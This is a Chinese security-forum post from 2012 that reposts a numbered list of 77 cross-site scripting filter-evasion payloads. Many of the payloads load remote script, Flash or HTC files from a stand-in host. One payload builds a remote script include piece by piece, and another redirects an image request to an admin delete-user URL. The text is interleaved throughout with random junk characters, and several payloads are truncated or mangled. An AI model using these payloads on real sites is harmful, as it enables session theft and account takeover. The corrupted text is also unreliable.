貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
# k4 l/ B% K7 ]6 V3 r
3 M% g3 a- b K2 ~. L% ~ (1)普通的XSS JavaScript注入/ k) u, H8 |! `0 U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; h2 @) `8 R: u; O( F2 ^
# J# f$ M9 S* S! O3 B/ e% _ (2)IMG标签XSS使用JavaScript命令0 a# u- y3 d" v0 E
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# X) a$ z. x |; a& A! F }7 u5 q" j% j: {4 A1 l+ U
(3)IMG标签无分号无引号1 [' R8 s: `6 |+ l+ f
<IMG SRC=javascript:alert(‘XSS’)> ^$ B6 Z" z8 B4 F7 k
& b( v! R# { O8 O! `+ Q
(4)IMG标签大小写不敏感' `7 u! B. A7 e
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ F5 V# w4 N3 ~) y2 M
. K5 i8 O+ e3 i (5)HTML编码(必须有分号)
- X: Y N$ a* e! O4 n" V7 Q. G <IMG SRC=javascript:alert(“XSS”)>+ Y& ?( W9 [9 v
- @9 N/ @( {' d2 _- ^* o! ^+ t3 |
(6)修正缺陷IMG标签
# f) Q% J1 d$ Z. z* _5 A g <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>6 t. ~' }: ?- `) H1 F0 Q
6 ], ?* M) l' I* G2 Q* d (7)formCharCode标签(计算器)* s- {& n1 J7 [5 [" }3 A/ o
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 N. R6 h8 H- K$ H {8 z
3 z4 ~( c1 _2 U (8)UTF-8的Unicode编码(计算器)4 B# E+ q0 {3 Z8 _
<IMG SRC=jav..省略..S')>
' N$ B. b- C: R* N
, d+ d# X0 D' a1 ~& M: m3 v (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 g2 }' L4 y8 S: e <IMG SRC=jav..省略..S')>6 |" X$ a) J3 y* l
9 z7 P4 G5 f, u4 r( |) k5 x+ g" g
(10)十六进制编码也是没有分号(计算器)
6 N9 `6 s* u f T% ^8 g <IMG SRC=java..省略..XSS')>& Z h0 u' {$ [$ A, a
: T; L) w S$ i! A1 e$ r* d (11)嵌入式标签,将Javascript分开
8 ^( P6 |. k% R3 Z9 d: V7 }7 n* T <IMG SRC=”jav ascript:alert(‘XSS’);”>5 K2 ?8 V. q j- g6 d2 y. Z
4 H, X/ A$ K* L. ]$ ? d, x, i (12)嵌入式编码标签,将Javascript分开) S- U, k! R# `6 C# \
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 |( v, w0 o$ }# T( \1 l7 n0 |9 _. ^# F: a2 v
(13)嵌入式换行符
+ d/ T/ n9 j9 j" f; U6 [- p9 v <IMG SRC=”jav ascript:alert(‘XSS’);”>
1 c: G1 [3 v3 R# U& M5 i# p( V
( b7 X6 c; x) p7 L) A (14)嵌入式回车
! y6 j3 m1 H9 q& Z' f! c <IMG SRC=”jav ascript:alert(‘XSS’);”>9 \' `8 X% T/ C, F6 u6 |
; F' F0 \+ I7 r# U
(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 Y2 p% i5 i" b/ q$ h
<IMG SRC=”javascript:alert(‘XSS‘)”>
' ^- j8 w$ x+ q$ r2 _
4 h) B9 O* C# i/ r (16)解决限制字符(要求同页面)4 @9 p: w( A3 E$ Z6 o
<script>z=’document.’</script>
& }" P7 j: b* k5 ~$ d9 @- k <script>z=z+’write(“‘</script>
' Q+ g. a X9 z3 @( G7 D7 D$ i <script>z=z+’<script’</script>" I* l+ m ~& Z+ u3 r
<script>z=z+’ src=ht’</script>
0 k, I' | F% Y" { <script>z=z+’tp://ww’</script>
4 l" E1 i4 t' w& b1 q <script>z=z+’w.shell’</script>
" t% h: M& P; u, P' @ <script>z=z+’.net/1.’</script>; Z5 I; G4 s# D5 Q* F; t
<script>z=z+’js></sc’</script>: F4 s" T) d: k& ^& y6 A
<script>z=z+’ript>”)’</script>% I5 |$ v/ D" C, e$ R5 e
<script>eval_r(z)</script>
6 t0 v0 h7 P3 X7 S) t( ^6 Y% m. E' A+ t2 r6 } @( V
(17)空字符8 Z0 d- {9 _: c) j
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* }* d- N1 H8 r- H7 ~
, y5 S) \3 H: x1 Q! } (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
$ ?+ y: Z+ f% ~ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 E) i+ b- b! w7 Z% K/ p" R2 Y0 F3 F1 I1 v, T$ B) y
(19)Spaces和meta前的IMG标签# E1 u) }# r' O: Q% E# B; D
<IMG SRC=” � javascript:alert(‘XSS’);”>3 m+ U! Y% ^. _
7 ?1 z5 d) z8 N/ O" i6 B* Q (20)Non-alpha-non-digit XSS% T" R$ `5 ]2 t& v2 M
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
3 n* h Y% a' f' M. ^& M7 U4 U
3 M/ s3 L& Z2 o8 b. e; K (21)Non-alpha-non-digit XSS to 2
/ y' y! g# J! x9 D ` <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>; s; O7 Y3 V ^ W3 g" L: t
# S3 Z) `& K$ f8 O8 b$ C( L: v# d
(22)Non-alpha-non-digit XSS to 3
8 S, J' B; x* N. q0 ]$ ~ <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 t, d/ u" x6 w/ [8 s
$ ?$ {) a7 b- z0 e; l) m3 F5 j" ^9 w/ @ (23)双开括号# ?2 \% x# l1 e( A6 ?/ j' a
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. X7 f0 g+ C5 k1 \4 b9 m8 S+ C! ~4 _3 k: k( J7 ~
(24)无结束脚本标记(仅火狐等浏览器)
) ~0 E I$ t% \4 o$ ~ <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
: }/ I4 h7 C9 M4 J7 u# B+ \8 |/ ^( a- e8 z
(25)无结束脚本标记2
4 k: d Q- f( o4 s <SCRIPT SRC=//3w.org/XSS/xss.js>- ]5 h0 B/ F/ B
I z& C" C6 T; R2 C9 |% b; T (26)半开的HTML/JavaScript XSS
0 X L, ^' Z" m& T- D- }* L <IMG SRC=”javascript:alert(‘XSS’)”9 H _2 O" _& s5 L% z$ `
& I8 a2 H U1 A5 I. h. i: V
(27)双开角括号- n& b9 w D2 G, m
<iframe src=http://3w.org/XSS.html <
; f9 D' o0 ], Q1 N1 G z* h* z
& n8 b' B+ W5 ~9 G# ?- U (28)无单引号 双引号 分号
6 p* Y" f5 n7 t* ] <SCRIPT>a=/XSS/7 M8 p% Y Z9 J7 M
alert(a.source)</SCRIPT># J4 P. c' J' M
/ M- e5 ?$ ^, I# _, a0 u (29)换码过滤的JavaScript+ ]1 P, h) r# f4 o3 O1 \# L
\”;alert(‘XSS’);//4 t! u2 ^9 O! Q3 I
# K6 s4 U3 n) z (30)结束Title标签6 o$ [8 c0 c6 C! K5 @7 v
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 D- B& R* `( A
; ^" j( \, f( W (31)Input Image
( p Z8 i$ p$ d) Q+ ~8 ^ <INPUT SRC=”javascript:alert(‘XSS’);”>
2 S# s# l o6 q0 z
1 E4 }% E( s, R: @" c0 ]& | (32)BODY Image
9 [5 M4 b4 N6 w0 w <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 F' M, H1 ]! j, }$ {( _4 t# B2 @( ?" R* L' N t* E
(33)BODY标签 M7 n$ Y; @8 A
<BODY(‘XSS’)>
5 e: [. u! W4 v/ M
D! ~3 I. y- B$ m+ a0 I2 t/ u (34)IMG Dynsrc
; F0 i6 @+ n, W! E <IMG DYNSRC=”javascript:alert(‘XSS’)”>0 \5 O; P" S/ M4 b9 z: z) i
% F2 H* n; ` i$ a- n+ u) n" R (35)IMG Lowsrc# k" } V& s0 N2 m5 ^
<IMG LOWSRC=”javascript:alert(‘XSS’)”>* b, C5 B$ t ~- e4 t) w
: ~/ L$ S2 _1 t. A& s; t+ ^ (36)BGSOUND: `0 b+ b* w* d
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
3 [7 o, g) z; m0 k) u" L# y% H) H5 R
. f# x1 W0 a: B) @4 B+ N$ T (37)STYLE sheet
0 e& N4 j) L' H- Y8 q <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& |7 i+ t5 C& }8 q& h2 b- s
' w O8 }0 Y" X (38)远程样式表
8 A! i5 d) u8 e <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>8 `) g. |; c7 H' `! N, C
+ A) T- w/ f0 D1 } (39)List-style-image(列表式)& \9 v1 A4 X! u; @
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
4 N) w' \( P/ H& n1 V0 ^
: J$ i9 E+ d2 E3 @( w& v8 r# R6 g (40)IMG VBscript. P; M+ [. s3 W! {0 V$ {
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 ]7 V7 O! E9 X8 W% P, @, \
9 g7 g' z0 A o: h% h6 \) ^+ _! S5 `1 \) W
(41)META链接url$ ]) I" P% A# N5 Q7 R; N
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
2 E; J3 M/ Z9 L, |% h, k7 v: \) x% j* A- v9 f K
(42)Iframe& R! k5 B2 x# V; t( B1 k# q
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>/ L* T. ~6 G: R2 `; W2 z
& P" t7 V( |1 c' D7 t7 l
(43)Frame
; z8 X2 I/ g+ D8 Z$ d( N <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>7 S9 w% S8 W* p2 O0 k
+ T, N/ B& m0 `+ K: C6 l8 D0 T# ~( g (44)Table( \# D/ l! }9 H' F- e2 D
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>- n; _' C( x+ Y
7 y2 b& r2 n5 Y" B I1 k
(45)TD4 N7 K; ~4 x; Z7 \
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 a- ?6 v A1 H1 Y( w3 q( B) z
' W3 I* z& x/ }9 U (46)DIV background-image
$ Z$ j0 U @/ {& F- _, U% m <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. V Z. E; n/ i2 c6 q8 V3 a5 [ g) a7 e5 q3 q" _+ Y8 T
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). Z2 N9 R+ g' ]7 \/ R
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
; C2 ^0 `, K ^3 }1 y; P5 E& l
; G. z6 b% ^" B" J (48)DIV expression
8 g/ Y% B1 e9 S( |/ ]2 \( @ <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) ^. F7 S, v0 [" {; ~- I' V# _# e, _' Y+ |8 G$ Q/ z
(49)STYLE属性分拆表达, o/ y1 O: w( @" x
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>6 G. W# k Q0 r5 E
. |; f) `2 R7 Z (50)匿名STYLE(组成:开角号和一个字母开头)) T) b1 a- J% R2 n: i* R
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ m5 d3 `) M1 d: c1 }% U4 v$ \- l2 ^# T, X7 ^" F' _ Y
(51)STYLE background-image
2 _5 s3 R3 w1 N& ` <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>6 s8 Z' p5 s$ ~: E# ]% C) |6 a; ^
& q3 A7 j; c5 L (52)IMG STYLE方式9 K& ~# N# S7 A3 l0 W
exppression(alert(“XSS”))’>
3 W- ?9 F. ]6 |4 R" M! ?' }( ~6 b, B2 B# J2 W N: D! L
(53)STYLE background
* w! }3 _! z6 t q' ] <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 `, \9 N3 ]0 i
( @4 ~8 V3 I( m, P (54)BASE
h$ P/ ~. u6 \3 `8 \0 ] <BASE HREF=”javascript:alert(‘XSS’);//”>
/ X) [3 R/ j" Z+ u: f; F' i* k8 z4 f9 m. u2 l( Y+ f1 _
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
' D# d) K' l/ V3 P2 b( _6 c) } <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 P/ ~) O: E/ @! z0 d4 P, a8 [. @4 s0 g5 ^
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 P- i) g& U U# E, R: |2 Y a=”get”;
& u! @1 f; y% O$ Y5 j2 g9 C5 x b=”URL(\”";/ D% T. e. {* }0 i# I9 }
c=”javascript:”;; W+ C1 e$ O Y; d9 {
d=”alert(‘XSS’);\”)”;
3 P% k2 S- ^0 ? T. Y eval_r(a+b+c+d);
# b1 Y) C7 w- `# O C6 I
5 R$ `9 ~1 h5 T& g9 V9 } (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
: r, D1 R/ n' c h <HTML xmlns:xss>
! w6 Z5 g2 _- \4 _6 a1 F <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
; _ g+ R4 r" K( h6 E <xss:xss>XSS</xss:xss>5 Z) g: w$ Y" I
</HTML>) [; S! `" H9 k6 Y( r: d0 s2 f
: ?' `6 r, h' E% F (58)如果过滤了你的JS你可以在图片里添加JS代码来利用, M: e( N' v. a4 J
<SCRIPT SRC=””></SCRIPT>
$ D( W; x6 }8 v8 L8 ^
* F2 _% C* e$ b4 I( z (59)IMG嵌入式命令,可执行任意命令
2 P% o+ P; o5 k9 \ <IMG SRC=”http://www.XXX.com/a.php?a=b”>$ v6 d7 y5 I m1 e2 l
( u( z2 k0 s6 k5 K2 j7 q/ z (60)IMG嵌入式命令(a.jpg在同服务器)% |- T& H+ z4 b6 J% {# v
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser* Z+ M( v3 R; W o' ]
* w+ M! V" e! X9 M4 U( K
(61)绕符号过滤
* a# N" }+ r/ I <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>" r2 t: f/ l* f C, C U. c
( e& [" G6 r! z0 \- q5 F# v: ] (62)
z& F' e Q: S& u$ [ <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ F& V/ F5 T1 F1 h% e7 \- ]% S0 ^* ^9 ^* h
(63)
7 I; c% i2 [$ C- g9 t <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 D" q( M8 X/ _7 |6 C8 Y* t2 h5 N5 R1 n/ N: \- R
(64)
" q0 I- J8 y- y7 L% k9 B <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
. h; [: `. V# n' S. p8 L/ D6 S& |+ d0 n- ]( B' {8 t+ ], B
(65)1 b, F* \: X; I$ [0 v
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>" R7 n% o! B" g
+ O1 Z0 G" {$ A
(66)
( O% ]! x6 M1 J% y x <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>0 z% } f! @7 g4 A1 P
v5 B5 b- _1 _" P3 m" L (67)0 C3 F0 d8 E1 {6 |2 O- x
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
) m* p" @/ k0 J: v" V1 S j
* I6 Z" ?' K( k- Z p' ]7 E- o (68)URL绕行
2 h; D' V/ k8 ~: ?0 T <A HREF=”http://127.0.0.1/”>XSS</A>1 @$ q7 E9 C# R) O2 W" y8 h
7 ]% Y2 u3 |: P9 [
(69)URL编码1 [+ y* l7 l N. P: K' N
<A HREF=”http://3w.org”>XSS</A>% \9 q8 N5 f+ }' R/ T p
- l% o z5 d) ~5 _, Q
(70)IP十进制
) R+ }: n$ M: H+ h+ b <A HREF=”http://3232235521″>XSS</A>- b1 w; C) F* I$ H! u, Q
- A& ^1 U5 t. T8 T/ j
(71)IP十六进制
) U5 P% z4 ~& a0 F' J8 |! e <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
3 v' \. y. C, d% k0 R% N( j+ |# W8 |! u7 ^
(72)IP八进制3 c9 U( P( M! p0 D m: O
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
z+ n6 a V/ Z5 k. j a( `9 Y1 I" n* E; Y3 H$ N, A
(73)混合编码8 B' g( c# h& h2 y B. q: M
<A HREF=”h9 S1 C7 ~; C1 O: Y" ] D
tt p://6 6.000146.0×7.147/”">XSS</A>3 |" {% N, g1 Q' B
8 k+ n' ^! g# V9 O3 G
(74)节省[http:]
. Z3 [+ ~9 q3 X: x <A HREF=”//www.google.com/”>XSS</A>
0 b8 s1 j& {9 Q' B7 l+ E2 s6 d$ X
) ?) B' `% ~* R5 v1 O# r, P (75)节省[www], k+ K9 z4 b" E; _+ _$ @
<A HREF=”http://google.com/”>XSS</A>$ q1 ?2 F q9 p! R$ C# u
$ L6 c0 {; k: m7 i! O (76)绝对点绝对DNS
7 v# F& Z" q) u! U k <A HREF=”http://www.google.com./”>XSS</A>
/ f5 R+ F P/ [1 [0 x- z# [
% l$ C( X/ F$ \, z0 [ (77)javascript链接 G: ?2 M/ t5 n1 `
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对